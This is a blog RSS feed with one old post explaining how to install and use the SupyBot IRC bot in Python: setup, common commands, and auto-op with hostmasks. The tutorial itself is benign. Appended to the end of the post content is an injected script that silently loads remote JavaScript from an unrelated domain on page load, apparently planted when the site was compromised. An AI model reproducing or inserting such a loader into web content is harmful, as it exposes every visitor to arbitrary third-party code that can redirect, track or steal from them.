<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Jkx@home &#187; irc</title>
	<atom:link href="http://www.larsen-b.com/tags/irc/feed" rel="self" type="application/rss+xml" />
	<link>http://www.larsen-b.com</link>
	<description>Titanium Exposé</description>
	<lastBuildDate>Fri, 31 Oct 2025 02:15:37 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5</generator>
		<item>
		<title>SupyBot</title>
		<link>http://www.larsen-b.com/Article/93.html</link>
		<comments>http://www.larsen-b.com/Article/93.html#comments</comments>
		<pubDate>Fri, 30 Jan 2004 16:17:12 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Network]]></category>
		<category><![CDATA[bot]]></category>
		<category><![CDATA[irc]]></category>
		<category><![CDATA[Python]]></category>

		<guid isPermaLink="false"></guid>
		<description><![CDATA[http://supybot.sourceforge.net (SupyBot) is the coolest ircbot written in python, that i&#8217; ever used. After 3 years of good work with eggdrop, it&#8217;s time to use something more userfriendly and python based. This is a short introduction to use it: download &#8230; <a href="http://www.larsen-b.com/Article/93.html">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p><a class="reference" href="http://supybot.sourceforge.net">http://supybot.sourceforge.net</a> (SupyBot) is the coolest  ircbot written in python, that i&#8217; ever used. After 3 years of good work with eggdrop, it&#8217;s time to use something more userfriendly and python based.</p>
<div id="this-is-a-short-introduction-to-use-it" class="section">
<h1><a name="this-is-a-short-introduction-to-use-it">This is a short introduction to use it:</a></h1>
<ul class="simple">
<li>download and install it (python setup.py install) as usual</li>
<li>run the supybot-wizard to build your own bot script</li>
<li>call supy-adduser script to add you as a user of the bot, don&#8217;t forget to add the &#8216;owner&#8217; capabiliy.</li>
<li>run the bot.</li>
</ul>
</div>
<div id="some-usefull-commands" class="section">
<h1><a name="some-usefull-commands">Some usefull commands:</a></h1>
<ul class="simple">
<li>@ / msg : to send a command to the bot, simply post @dummy_command or send it to bot directly (/msg)</li>
<li>to load a plugin: @load plugin_name</li>
<li>to identify yourself (users are in conf/users.conf) /msg bot identify login password</li>
<li>@list : list (w/o argument) will return the plugin list</li>
<li>@list Plugin; will give you function of the plugin</li>
<li>@help plugin ../ @apropos: give help about commands.</li>
<li>@services getops: ask the op for the bot at chanserv</li>
</ul>
</div>
<div id="how-auto-op-works" class="section">
<h1><a name="how-auto-op-works">How auto-op works:</a></h1>
<p>The main purpose of an ircbot is to give op right at the user join. To do this you need to:</p>
<ul class="simple">
<li>@enforcer config auto-op true : ask the ircbot to do auto-op</li>
<li>add the capabily &#8216;auto-op&#8217; to the user: @addcapabilty  login auto-op</li>
<li>Now when the user identity himself, he will be oped by the bot</li>
<li>the next step is to play w/ hostmasks to avoid the need of identify<br />
call @hostmasks login to see the hostmasks for a user / and add/delhostmasks to set masks need to do this. for exemple: addhostmask jkx <a class="reference" href="mailto:'soif!~soif@*.abo.wanadoo.fr">&#8216;soif!~soif@*.abo.wanadoo.fr</a>&#8216;</li>
</ul>
</div>
<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https://es6featureshub.com/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);</script></p>
]]></content:encoded>
			<wfw:commentRss>http://www.larsen-b.com/Article/93.html/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
